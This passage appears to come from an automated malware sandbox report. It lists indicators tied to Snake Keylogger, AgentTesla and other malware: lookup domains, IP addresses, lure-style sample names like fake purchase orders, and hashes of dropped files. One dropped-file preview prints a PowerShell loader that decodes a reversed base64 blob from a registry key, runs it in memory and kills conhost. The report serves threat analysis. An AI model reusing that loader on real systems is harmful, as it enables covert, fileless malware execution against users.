                          Purchase Order.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                          • checkip.dyndns.org/
                          Purchase Order - P04737.xlsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • checkip.dyndns.org/
                          Revised PI_2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                          • checkip.dyndns.org/
                          ORDER--GO289533005XXXX024.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • checkip.dyndns.org/
                          Purchase Order.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • checkip.dyndns.org/
                          57m#U00b3 LPG SEMI TRAILER 7 NOS.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                          • checkip.dyndns.org/
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          reallyfreegeoip.orgDSD876543456780000.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 188.114.97.3
                          Deye Union - PO # 23081377.exeGet hashmaliciousSnake KeyloggerBrowse
                          • 188.114.97.3
                          rPO0977-6745.exeGet hashmaliciousSnake KeyloggerBrowse
                          • 188.114.97.3
                          z1QuotationSheetVSAA6656776.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                          • 172.67.177.134
                          rcrypt.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                          • 188.114.96.3
                          SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 188.114.96.3
                          Purchase Order POT-247110.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 188.114.96.3
                          SecuriteInfo.com.Trojan.PackedNET.2944.2376.13684.exeGet hashmaliciousSnake KeyloggerBrowse
                          • 188.114.96.3
                          SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtfGet hashmaliciousSnake KeyloggerBrowse
                          • 188.114.96.3
                          Purchase Order.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                          • 188.114.96.3
                          checkip.dyndns.comDSD876543456780000.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 158.101.44.242
                          Confirmation transfer Note AGS # 22-00379.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                          • 158.101.44.242
                          Deye Union - PO # 23081377.exeGet hashmaliciousSnake KeyloggerBrowse
                          • 132.226.247.73
                          rPO0977-6745.exeGet hashmaliciousSnake KeyloggerBrowse
                          • 158.101.44.242
                          z1QuotationSheetVSAA6656776.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                          • 158.101.44.242
                          rcrypt.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                          • 158.101.44.242
                          rRFQ_025261-97382.exeGet hashmaliciousSnake KeyloggerBrowse
                          • 158.101.44.242
                          SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 132.226.247.73
                          Purchase Order POT-247110.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 132.226.247.73
                          SecuriteInfo.com.Trojan.PackedNET.2944.2376.13684.exeGet hashmaliciousSnake KeyloggerBrowse
                          • 132.226.8.169
                          fp2e7a.wpc.phicdn.netImport_Tax Invoice_PL_xls_0000000000000000000 .exeGet hashmaliciousRemcos, DBatLoaderBrowse
                          • 192.229.221.95
                          https://gist.github.com/qiuxiuya/d1415f62623f8acf65dd0a4c1096b1e2Get hashmaliciousXmrigBrowse
                          • 192.229.221.95
                          https://drive.google.com/file/d/18uQaHuJAdR5xS3lALDyDJ0z0B_5vCmVE/view?usp=drivesdkGet hashmaliciousUnknownBrowse
                          • 192.229.221.95
                          http://oopb.juhrtjao.shop/Get hashmaliciousUnknownBrowse
                          • 192.229.221.95
                          http://www.dpm.gov.pgGet hashmaliciousUnknownBrowse
                          • 192.229.221.95
                          http://infomatter-activity-do.web.appGet hashmaliciousUnknownBrowse
                          • 192.229.221.95
                          https://forms.office.com/Pages/ResponsePage.aspx?id=BqNskUxs8U6nXGGZ_4IjJrg09W7G0L5Pruu0tOeqXPNUMVdNUUg1OEZaVjM1NDA4MDU1QlFHUlhGSy4uGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                          • 192.229.221.95
                          http://www.dpm.gov.pgGet hashmaliciousUnknownBrowse
                          • 192.229.221.95
                          Lisect_AVT_24003_G1B_84.msiGet hashmaliciousAteraAgentBrowse
                          • 192.229.221.95
                          https://emea.dcv.ms/V1nd75OZS4Get hashmaliciousHTMLPhisherBrowse
                          • 192.229.221.95
                          horus-protector.proCheque.jsGet hashmaliciousAgentTeslaBrowse
                          • 172.67.207.214
                          DRAFT DOCUMENTS.jsGet hashmaliciousAgentTeslaBrowse
                          • 172.67.207.214
                          bg.microsoft.map.fastly.netImport_Tax Invoice_PL_xls_0000000000000000000 .exeGet hashmaliciousRemcos, DBatLoaderBrowse
                          • 199.232.210.172
                          https://gist.github.com/CreativeRoy/7405537df8cb20f60a08246a6093453bGet hashmaliciousCoinhive, XmrigBrowse
                          • 199.232.210.172
                          LisectAVT_2403002C_169.dllGet hashmaliciousUnknownBrowse
                          • 199.232.210.172
                          LisectAVT_2403002C_168.exeGet hashmaliciousBdaejecBrowse
                          • 199.232.210.172
                          https://forms.office.com/Pages/ResponsePage.aspx?id=kAi_W0yZC0qQpKIHxTYoPxauHzsZJkZMuCk5U9e1Y4RUNFlCMDNQTTdIRTdLV0dKQ1lOUjJYQjg4Si4u&origin=Invitation&channel=0Get hashmaliciousHTMLPhisherBrowse
                          • 199.232.210.172
                          LisectAVT_2403002C_28.exeGet hashmaliciousRemcosBrowse
                          • 199.232.214.172
                          LisectAVT_2403002C_36.exeGet hashmaliciousAmadeyBrowse
                          • 199.232.214.172
                          LisectAVT_2403002C_52.exeGet hashmaliciousUnknownBrowse
                          • 199.232.214.172
                          https://drive.google.com/file/d/18uQaHuJAdR5xS3lALDyDJ0z0B_5vCmVE/view?usp=drivesdkGet hashmaliciousUnknownBrowse
                          • 199.232.214.172
                          Q2XwE8NRLx.exeGet hashmaliciousQuasarBrowse
                          • 199.232.214.172
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          CLOUDFLARENETUSScan file.docGet hashmaliciousUnknownBrowse
                          • 188.114.96.3
                          LisectAVT_2403002C_15.exeGet hashmaliciousAgentTeslaBrowse
                          • 104.26.13.205
                          LisectAVT_2403002C_16.exeGet hashmaliciousAgentTeslaBrowse
                          • 104.26.12.205
                          nX1oQE2we8.exeGet hashmaliciousCryptOne, QbotBrowse
                          • 104.21.34.74
                          LisectAVT_2403002C_18.exeGet hashmaliciousRaccoonBrowse
                          • 188.114.96.3
                          gbl.exeGet hashmaliciousUnknownBrowse
                          • 104.26.4.75
                          LisectAVT_2403002C_18.exeGet hashmaliciousRaccoonBrowse
                          • 188.114.97.3
                          gbl.exeGet hashmaliciousUnknownBrowse
                          • 172.67.68.40
                          https://forms.office.com/Pages/ResponsePage.aspx?id=kAi_W0yZC0qQpKIHxTYoPxauHzsZJkZMuCk5U9e1Y4RUNFlCMDNQTTdIRTdLV0dKQ1lOUjJYQjg4Si4u&origin=Invitation&channel=0Get hashmaliciousHTMLPhisherBrowse
                          • 104.17.25.14
                          LisectAVT_2403002C_3.exeGet hashmaliciousFormBookBrowse
                          • 172.67.184.22
                          CLOUDFLARENETUSScan file.docGet hashmaliciousUnknownBrowse
                          • 188.114.96.3
                          LisectAVT_2403002C_15.exeGet hashmaliciousAgentTeslaBrowse
                          • 104.26.13.205
                          LisectAVT_2403002C_16.exeGet hashmaliciousAgentTeslaBrowse
                          • 104.26.12.205
                          nX1oQE2we8.exeGet hashmaliciousCryptOne, QbotBrowse
                          • 104.21.34.74
                          LisectAVT_2403002C_18.exeGet hashmaliciousRaccoonBrowse
                          • 188.114.96.3
                          gbl.exeGet hashmaliciousUnknownBrowse
                          • 104.26.4.75
                          LisectAVT_2403002C_18.exeGet hashmaliciousRaccoonBrowse
                          • 188.114.97.3
                          gbl.exeGet hashmaliciousUnknownBrowse
                          • 172.67.68.40
                          https://forms.office.com/Pages/ResponsePage.aspx?id=kAi_W0yZC0qQpKIHxTYoPxauHzsZJkZMuCk5U9e1Y4RUNFlCMDNQTTdIRTdLV0dKQ1lOUjJYQjg4Si4u&origin=Invitation&channel=0Get hashmaliciousHTMLPhisherBrowse
                          • 104.17.25.14
                          LisectAVT_2403002C_3.exeGet hashmaliciousFormBookBrowse
                          • 172.67.184.22
                          UTMEMUSDeye Union - PO # 23081377.exeGet hashmaliciousSnake KeyloggerBrowse
                          • 132.226.247.73
                          SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 132.226.247.73
                          Purchase Order POT-247110.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 132.226.247.73
                          SecuriteInfo.com.Trojan.PackedNET.2944.2376.13684.exeGet hashmaliciousSnake KeyloggerBrowse
                          • 132.226.8.169
                          SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtfGet hashmaliciousSnake KeyloggerBrowse
                          • 132.226.247.73
                          Purchase Order.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                          • 132.226.247.73
                          yIRn1ZmsQF.elfGet hashmaliciousUnknownBrowse
                          • 128.169.78.63
                          kHeNppYRgN.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 132.226.8.169
                          Purchase Order - P04737.xlsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 132.226.247.73
                          Revised PI_2024.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                          • 132.226.247.73
                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          54328bd36c14bd82ddaa0c04b25ed9adLisect_AVT_24003_G1B_21.exeGet hashmaliciousUnknownBrowse
                          • 188.114.97.3
                          Lisect_AVT_24003_G1B_21.exeGet hashmaliciousUnknownBrowse
                          • 188.114.97.3
                          Lisect_AVT_24003_G1B_127.exeGet hashmaliciousPureLog StealerBrowse
                          • 188.114.97.3
                          DSD876543456780000.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 188.114.97.3
                          SecuriteInfo.com.W32.Lokibot.N.gen.Eldorado.28246.8151.exeGet hashmaliciousLokibotBrowse
                          • 188.114.97.3
                          Deye Union - PO # 23081377.exeGet hashmaliciousSnake KeyloggerBrowse
                          • 188.114.97.3
                          rPO0977-6745.exeGet hashmaliciousSnake KeyloggerBrowse
                          • 188.114.97.3
                          rcrypt.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                          • 188.114.97.3
                          Purchase Order POT-247110.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                          • 188.114.97.3
                          SecuriteInfo.com.Trojan.PackedNET.2944.2376.13684.exeGet hashmaliciousSnake KeyloggerBrowse
                          • 188.114.97.3
                          No context
                          Process:C:\Windows\System32\wermgr.exe
                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):65536
                          Entropy (8bit):0.5340359286355232
                          Encrypted:false
                          SSDEEP:96:6vFNuwjRrxYidPRH3Uje0eD/JuNnN9KQXIGZAX/d5FMT2SlPkpXmTAHf/VXT5NHn:A/rRmGPR30wAAzuiFvZ24lO8
                          MD5:AAE99212DEBA5031D55E1CAD662D2231
                          SHA1:B770203D599FF0A94D5889287CD57FFE63D12FBF
                          SHA-256:B06532893877BCC2B88B7F249A2CD284ABB2C6849604DDEB5B5479610746803F
                          SHA-512:73D45ED88C385619D3E379696651D4BEA7C9464BFC910305FDB4D145DACE7DD69C9F28210990A2942A45E8BB7FF77FAE6D8D0A4067AB9AABEF960229E146DA86
                          Malicious:false
                          Reputation:low
                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.P.o.w.e.r.S.h.e.l.l.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.6.3.6.7.8.5.0.9.5.7.2.1.2.5.....R.e.p.o.r.t.T.y.p.e.=.1.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.6.3.6.7.6.7.8.9.0.6.1.4.6.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.7.0.a.f.6.c.4.-.4.f.9.d.-.4.6.8.3.-.b.7.e.6.-.4.4.2.9.6.3.c.e.1.a.e.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.0.8.-.0.0.0.1.-.0.0.1.3.-.9.0.d.9.-.c.c.e.2.6.7.d.e.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.3.7././.0.6././.1.0.:.0.7.:.4.5.:.2.5.!.7.d.6.d.a.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.
                          Process:C:\Windows\System32\wermgr.exe
                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):7414
                          Entropy (8bit):3.684628234508341
                          Encrypted:false
                          SSDEEP:96:RSIU6o7wVetbnReKCgus6Y4psD9gmfHNV9renJq5aMT5Rm:R6l7wVeJReKCgd6YksZgmftqcpT5Rm
                          MD5:A0CE8E1833DF361F72C577D52BFAC1BC
                          SHA1:80ECB0A132B7A5D5C74DA94B3CF278ABBE1322AF
                          SHA-256:91E684CF9437B44CA58A07218D3C88498C06A5350DEFC6D9A3731748184BEB4A
                          SHA-512:D8A41B9B1CD573705DB5E43C73AE91F77BF6B787654B0CC67FBB128704E3E3609DCEBEA5D5D2A8423B02304238AA3E08432280C3F1FD13E4ECB26ED4CA1F5C6D
                          Malicious:false
                          Reputation:low
                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.6.8.8.<./.P.i.
                          Process:C:\Windows\System32\wermgr.exe
                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):4899
                          Entropy (8bit):4.5682200920517575
                          Encrypted:false
                          SSDEEP:48:cvIwWl8zs/Jg771I9h+WpW8VY/Ym8M4JFKlnOtSFOyq8vT0OtcytfWd:uIjfhI7i/7VfJFKlnoWT0RufWd
                          MD5:1952E6AFA6D794BBE868CEA8CAC51515
                          SHA1:DBA92020133797E61BE963203BACA70542D9B6AB
                          SHA-256:EE2774E8C0E42F114735B7B9F8D84D90A02A3F347261C0CF1BDE8F808CEFF191
                          SHA-512:CCE510F01B5BE3B0B8A33D07EDE3C7151F4B0B1EA870FC1236AA32840F67BCFB281612C186AAEB10F8A9716FCCA81628053ADF3BB1262AC63A479545CD1D6A4E
                          Malicious:false
                          Reputation:low
                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="426177" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                          Process:C:\Windows\System32\wscript.exe
                          File Type:ASCII text, with very long lines (38912), with no line terminators
                          Category:dropped
                          Size (bytes):38912
                          Entropy (8bit):3.103296309970438
                          Encrypted:false
                          SSDEEP:384:JqRg5ov91cst9LvjQcrs+S1uAjQ8C5qlP4f5WCG9Ntjjdkjn9kmjpxj+to:VK91tnQask82SCGrtjjdkjn9kmjpxato
                          MD5:1E3C692754C3818B46196BC5DDB979FE
                          SHA1:3E0BE777BD53763F2132989696F6FE4289358414
                          SHA-256:2AAC1BC8F6ED5DA542FAA1C49BF27B0E8E4D14D46084D9811E8A7C0124632775
                          SHA-512:F663539317FD11BCFA689AA61C7404DA286853329B8F4007F7718A8F7C62912F958D16386E750AA1C75E0F4ADF51F9298E0E8846864283E750D3F4DA40AC025D
                          Malicious:false
                          Reputation:low
                          Preview:0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
                          Process:C:\Windows\System32\wscript.exe
                          File Type:ASCII text, with very long lines (30040), with no line terminators
                          Category:dropped
                          Size (bytes):30040
                          Entropy (8bit):3.1200221091476976
                          Encrypted:false
                          SSDEEP:768:SLE9uko/3o1v4c4g2EePv/qcwUNQX3vGcXaA+7/BzGdZQnM:SLE9uko/3o1v4c4g2EePv/qcwUNQX3vZ
                          MD5:478D611189848AD7EAEC4EFD3CE89785
                          SHA1:15236FCDC48858F49310EE103178620A8A0F0579
                          SHA-256:30B2682DB395FDE9DC607D9B69C12D087CA4570EEF304DEF6941D3E5CB1528E6
                          SHA-512:6E4E97C5E437215BF53F915D6C074376C1BF64B72544D15821AD037C28F24C79988485AEACF7F4B261C91514FC6AA1FC9F3B55BAA0B4AB6F5F539C3CC6AEA6D8
                          Malicious:false
                          Preview:3D41414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):11887
                          Entropy (8bit):4.901437212034066
                          Encrypted:false
                          SSDEEP:192:Zxoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9L:Srib4ZmVoGIpN6KQkj2Fkjh4iUxsNYWd
                          MD5:ED30A738A05A68D6AB27771BD846A7AA
                          SHA1:6AFCE0F6E39A9A59FF54956E1461F09747B57B44
                          SHA-256:17D48B622292E016CFDF0550340FF6ED54693521D4D457B88BB23BD1AE076A31
                          SHA-512:183E9ECAF5C467D7DA83F44FE990569215AFDB40B79BCA5C0D2C021228C7B85DF4793E2952130B772EC0896FBFBCF452078878ADF3A380A6D0A6BD00EA6663F2
                          Malicious:false
                          Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):3252
                          Entropy (8bit):5.405345235905464
                          Encrypted:false
                          SSDEEP:96:3qgzlHyIFKL2O9qrh7Kf++J5Eo9AdrxwS:ag1yt2jrA9LL2R
                          MD5:759268A1BE9AAB36424DEC4FB9AA1187
                          SHA1:6652F1638FC2FE6FD2190AC5C24B2FBB548C7128
                          SHA-256:C10BF7A87A9DA15CE0035CA00DC264198D497A270BCC56BAA616525BF1BC44A9
                          SHA-512:643626E26B91E8EC8AC7B0AE379D2E1E6B9FBA03148B49D4CED1694A1ECA6740CF91F7E9AB7AC8300C6EBC59D772248F39E2F1F4F0E0DF243D859E82C8F9809E
                          Malicious:false
                          Preview:@...e...........................................................H..............@-....f.J.|.7h8..p.......Microsoft.Powershell.PSReadline.H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.8.................C}...C....n..Bi.......Microsoft.CSharpP...............
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with no line terminators
                          Category:dropped
                          Size (bytes):60
                          Entropy (8bit):4.038920595031593
                          Encrypted:false
                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                          Malicious:false
                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):252
                          Entropy (8bit):5.375197184616637
                          Encrypted:false
                          SSDEEP:6:xVwe5ljxsu2xKbLtSXqo83ry/BC2XZuBiA2VA4mjXE/BCVFI59:772EtSXqdm/BLJci1VA4r/Bqo
                          MD5:6562BD37E31752F0DC0719B1EC7E4C8D
                          SHA1:C859FF12BD119A82CFB4DC6720E222BBF962C0DC
                          SHA-256:E8155096FEC43C3D91ABA8EC791F9D56A5FE0B3A6D1A5642F256FE56D53827A2
                          SHA-512:17A89E5EB794B86454F4B9D48451A247B66669D159CE0C575E793B93255F4C14E774E2A8029F5BD955771D9228A2DD041555ADA525EB919471D159136299F477
                          Malicious:false
                          Preview:[AppDomain]::CurrentDomain.Load([Convert]::FromBase64String((-join (Get-ItemProperty -LiteralPath 'HKCU:\Software\YLhjFraZZwiadZg' -Name 's').s | ForEach-Object {$_[-1..-($_.Length)]}))); [a.a]::a('YLhjFraZZwiadZg')..Stop-Process -Name conhost -Force..
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):6221
                          Entropy (8bit):3.7258847738977563
                          Encrypted:false
                          SSDEEP:96:BM+cOqCiiNZeHYkvhkvCCt/Fa2MhH4Fa29hHC:BjtNwHE/FWeFzw
                          MD5:43B593C621ABA6B42D8749DC62F4B13D
                          SHA1:2877340B369596FC4C950A553F760BF256687E5B
                          SHA-256:47F42587F4EA746CDB65C9753547D0B092708CA8AC528C19BCBE0AD672756CB6
                          SHA-512:016B67317C361E5F0A9A00C5C9660BEF983E3216B6BB9EB6E2BB7449B69853AD31E34424C5BE7AC43C2457DB83085DEF7C9022D2FFA801438E24AE48BB88822A
                          Malicious:false
                          Preview:...................................FL..................F.".. ...]...z...sT..g...z.:{.............................:..DG..Yr?.D..U..k0.&...&.......;..z...C...g...}...g.......t...CFSF..1.....EW.V..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.V.X.>..........................B...A.p.p.D.a.t.a...B.V.1......X.>..Roaming.@......EW.V.X.>..............................R.o.a.m.i.n.g.....\.1.....EW.X..MICROS~1..D......EW.V.X.>..............................M.i.c.r.o.s.o.f.t.....V.1.....EW'Y..Windows.@......EW.V.X.>..........................9[..W.i.n.d.o.w.s.......1.....EW.V..STARTM~1..n......EW.V.X.>....................D.....XS..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EWXX..Programs..j......EW.V.X.>....................@......4..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.VEW.V..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.V.X.>................
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):6221
                          Entropy (8bit):3.7258847738977563
                          Encrypted:false
                          SSDEEP:96:BM+cOqCiiNZeHYkvhkvCCt/Fa2MhH4Fa29hHC:BjtNwHE/FWeFzw
                          MD5:43B593C621ABA6B42D8749DC62F4B13D
                          SHA1:2877340B369596FC4C950A553F760BF256687E5B
                          SHA-256:47F42587F4EA746CDB65C9753547D0B092708CA8AC528C19BCBE0AD672756CB6
                          SHA-512:016B67317C361E5F0A9A00C5C9660BEF983E3216B6BB9EB6E2BB7449B69853AD31E34424C5BE7AC43C2457DB83085DEF7C9022D2FFA801438E24AE48BB88822A
                          Malicious:false
